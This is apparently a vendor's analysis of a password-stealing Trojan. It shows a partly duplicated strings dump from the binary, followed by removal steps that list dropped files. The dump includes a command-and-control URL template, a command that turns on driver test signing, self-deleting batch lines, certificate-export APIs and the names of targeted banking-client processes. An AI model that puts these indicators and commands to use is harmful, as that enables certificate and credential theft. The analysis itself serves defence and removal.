PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
: :$:(:,:0:4:
= =$=(=,=0=4=
1 2*20262
7%7X7u7!8&8;9Z9
kernel32.dll
Wadvapi32.dll
rapport
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
"%s" %s
/c "%s"
shell32.dll
urlmon.dll
cabinet.dll
\StringFileInfo\xx\%s
%Documents and Settings%\%current user%\Local Settings\Temp
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{3D6E1BE3-083C-4088-F013-F140DE00D252}
Explorer.EXE_1684_rwx_021E0000_0006D000:
.text
`.data
.idata
@.reloc
PSSSSSSh
bcdedit.exe -set TESTSIGNING ON
%s\drivers\%s.sys
\\.\NtSecureSys
ntdll.dll
svchost.exe
EUDC\%d
KeDelayExecutionThread
WinExec
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
RegCloseKey
RegFlushKey
RegCreateKeyExA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
msvcrt.dll
Invalid parameter passed to C runtime function.
0123456789
.sMH#
\*%Sa
RegDeleteKeyExW
gdiplus.dll
GdiplusShutdown
#ÛY_
5>(4 6 3
>5#? = 8
*:4.::,|
y.dRR
&*("?#=1http://maerholst.com/1/?s=%u&v=%u
REPORT
userenv.dll
del "%s"
if exist "%s" goto d
del /F "%s"
HTTP/1.1
http://www.google.com/
http://www.bing.com/
t.Ht$HHt
w%fkN
L$$
rnÊ
m9.td
McaG%n%c
zcÁ
MsgWaitForMultipleObjects
GetKeyboardState
RegCreateKeyExW
RegQueryInfoKeyW
RegDeleteKeyW
RegOpenKeyExW
RegEnumKeyExW
CryptGetKeyParam
CryptImportKey
CryptDestroyKey
UrlUnescapeA
PathIsURLW
SHLWAPI.dll
ShellExecuteW
Secur32.dll
ole32.dll
WS2_32.dll
PFXImportCertStore
CertDeleteCertificateFromStore
CertOpenSystemStoreW
CertCloseStore
CertEnumCertificatesInStore
CertDuplicateCertificateContext
PFXExportCertStoreEx
CRYPT32.dll
HttpSendRequestExA
HttpQueryInfoA
InternetCrackUrlA
HttpOpenRequestA
HttpEndRequestA
HttpAddRequestHeadersA
WININET.dll
OLEAUT32.dll
NETAPI32.dll
IPHLPAPI.DLL
VERSION.dll
: :$:(:,:0:4:
= =$=(=,=0=4=
1 2*20262
7%7X7u7!8&8;9Z9
kernel32.dll
Wadvapi32.dll
rapport
SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\%s
launchpadshell.exe
dirclt32.exe
wtng.exe
prologue.exe
pcsws.exe
fdmaster.exe
"%s" %s
/c "%s"
shell32.dll
urlmon.dll
cabinet.dll
\StringFileInfo\xx\%s
%Documents and Settings%\%current user%\Local Settings\Temp
%Documents and Settings%\%current user%\Local Settings\Application Data
Global\{3D6E1BE3-083C-4088-F013-F140DE00D252}
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
mlose.exe:1056
%original file name%.exe:1456
opera_autoupdater.exe:1200 - Delete the original Trojan-PSW file.
- Delete or disinfect the following files created/modified by the Trojan-PSW:
%System%\drivers\13c40f.sys (745 bytes)
%Documents and Settings%\%current user%\NTUSER.DAT.LOG (6272 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Olyxeg\roguir.exe (4827 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\KMO1F7C.bat (173 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\opera_autoupdater.exe (23 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\mlose.exe (3715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\0403UKc[1].elf (1799 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.